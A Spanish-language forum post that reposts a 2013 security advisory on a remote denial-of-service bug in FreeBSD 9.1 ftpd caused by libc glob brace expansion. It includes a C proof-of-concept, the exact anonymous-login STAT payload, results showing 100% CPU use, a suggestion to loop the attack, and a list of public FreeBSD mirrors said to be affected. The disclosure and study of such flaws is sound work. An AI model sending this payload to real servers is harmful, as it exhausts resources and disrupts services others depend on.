Autor Tema: Denegación de servicio remota en ftpd para FreeBSD 9.1  (Leído 5640 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado WHK

  • 吴阿卡
  • Administrador
  • Aportador
  • *****
  • Mensajes: 555
  • Karma: +15/-3
  • Coder
    • Yahoo Instant Messenger - yan_uniko_102
    • Ver Perfil
    • WHK
    • Email
Denegación de servicio remota en ftpd para FreeBSD 9.1
« : febrero 05, 2013, 10:52:12 am »
Hace muy poco fué parchada una versión para el servidor ftp de FreBSD 9.1 que permitia a un atacante remoto causar una denegación de servicio con un simple script.
/>
/>Acá copio y pego la noticia:
/>

/>FreeBSD 9.1 ftpd Remote Denial of Service
/> Maksymilian Arciemowicz
/> http://cxsecurity.org/
/> http://cxsec.org/
/>
/> Public Date: 01.02.2013
/> URL: http://cxsecurity.com/issue/WLB-2013020003
/>
/> Affected servers:
/> - ftp.uk.freebsd.org,
/> - ftp.ua.freebsd.org,
/> - ftp5.freebsd.org,
/> - ftp5.us.freebsd.org,
/> - ftp10.freebsd.org,
/> - ftp3.uk.freebsd.org,
/> - ftp7.ua.freebsd.org,
/> - ftp2.se.freebsd.org,
/> - ftp2.za.FreeBSD.org,
/> - ftp2.ru.freebsd.org,
/> - ftp2.pl.freebsd.org
/> and more...
/>
/>
/> --- 1. Description ---
/> I have decided check BSD ftpd servers once again for wildcards. Old
/> bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last
/> FreeBSD version.
/> Attacker, what may connect anonymously to FTP server, may cause CPU
/> resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous',
/> sending 'STAT' command with special wildchar, enought to create ftpd
/> process with 100% CPU usage.
/>
/> Proof of Concept (POC):
/> See the difference between NetBSD/libc and FreeBSD/libc.
/> --- PoC ---
/>
Código: [Seleccionar]
#include <stdio.h>
 #include <glob.h>
 
 int main(){
                 glob_t globbuf;
                 char stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}";
                 glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, &globbuf);
 }
--- PoC ---
/>
/> --- Exploit ---
/> user anonymous
/> pass anonymous
/>
Código: [Seleccionar]
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
--- /Exploit ---
/>
/> Result of attack:
/>
Citar
ftp    13034  0.0  0.4  10416  1944  ??    10:48PM    0:00.96
/> ftpd: cxsec.org anonymous/anonymous (ftpd)
/> ftp    13035  0.0  0.4  10416  1944  ??    10:48PM    0:00.89
/> ftpd: cxsec.org anonymous/anonymous (ftpd)
/> ftp    13036  0.0  0.4  10416  1944  ??    10:48PM    0:00.73
/> ftpd: cxsec.org anonymous/anonymous (ftpd)
/> ftp    13046  0.0  0.4  10416  1952  ??    10:48PM    0:00.41
/> ftpd: cxsec.org anonymous/anonymous (ftpd)
/> ftp    13047  0.0  0.4  10416  1960  ??    10:48PM    0:00.42
/> ftpd: cxsec.org anonymous/anonymous (ftpd)
/> ...
/> root    13219  0.0  0.3  10032  1424  ??    10:52PM    0:00.00
/> /usr/libexec/ftpd -dDA
/> root    13225  0.0  0.3  10032  1428  ??    10:52PM    0:00.00
/> /usr/libexec/ftpd -dDA
/> root    13409  0.0  0.3  10032  1404  ??    10:53PM    0:00.00
/> /usr/libexec/ftpd -dDA
/> root    13410  0.0  0.3  10032  1404  ??    10:53PM    0:00.00
/> /usr/libexec/ftpd -dDA
/> ...
/>
/> =>Sending:
/> STAT {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
/>
/> =>Result:
/> @ps:
/> ftp      1336 100.0  0.5  10416  2360  ??    11:15PM 600:39.95
/> ftpd: 127.0.0.1: anonymous/anonymous@cxsecurity.com: \r\n (ftpd)$
/> @top:
/> 1336 root        1 103    0 10416K  2360K RUN    600:53 100.00% ftpd
[/noae]
/>
/> one request over 600m (~10h) execution time and 100% CPU usage. This
/> issue allow to create N ftpd processes with 100% CPU usage.
/>
/> Just create loop while(1) and send these commands
/> ---
/> user anonymous
/> pass anonymous
/>
Código: [Seleccionar]
stat {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
---
/>
/> NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011)
/> http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2
/>
/> The funniest is that freebsd use GLOB_LIMIT in ftpd server.
/> http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c
/> ---
/>
Código: [Seleccionar]
        if (strpbrk(whichf, "~{[*?") != NULL) {
                 int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
 
                 memset(&gl, 0, sizeof(gl));
                 gl.gl_matchc = MAXGLOBARGS;
                 flags |= GLOB_LIMIT;
                 freeglob = 1;
                 if (glob(whichf, flags, 0, &gl)) {
---
/>
/> but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU
/> resource exhaustion. ;]
/>
/> Libc was also vulnerable in Apple and Oracle products.
/> http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
/> http://support.apple.com/kb/HT4723
/>
/> only FreeBSD and GNU glibc are affected
/>
/>
/> --- 2. Exploit ---
/> http://cxsecurity.com/issue/WLB-2013010233
/>
/>
/> --- 3. Fix ---
/> Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve
/> problem with security ;)
/>
/>
/> --- 4. References ---
/> Multiple Vendors libc/glob(3) remote ftpd resource exhaustion
/> http://cxsecurity.com/issue/WLB-2010100135
/> http://cxsecurity.com/cveshow/CVE-2010-2632
/>
/> Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion
/> http://cxsecurity.com/issue/WLB-2011050004
/> http://cxsecurity.com/cveshow/CVE-2011-0418
/>
/> More CWE-399 resource exhaustion examples:
/> http://cxsecurity.com/cwe/CWE-399
/>
/> The regcomp implementation in the GNU C Library allows attackers to
/> cause a denial of service proftpd
/> http://cxsecurity.com/cveshow/CVE-2010-4051
/> http://cxsecurity.com/cveshow/CVE-2010-4052
/> http://www.kb.cert.org/vuls/id/912279
/>
/>
/> --- 5. Contact ---
/> Maksymilian Arciemowicz
/> max 4T cxsecurity.com
/> http://cxsecurity.com/
/> http://cxsec.org/
/>
/>Fuente: http://seclists.org/fulldisclosure/2013/Feb/3
/>
Mi WEB - The Hacktivism is not a crime - Si no lo hago yo, que lo hagan otros -
Si has encontrado útil este articulo recuerda que puedes ayudarnos con tu donación voluntaria la cual ayudará al staff y a la mantención del foro.


. . . . . . . .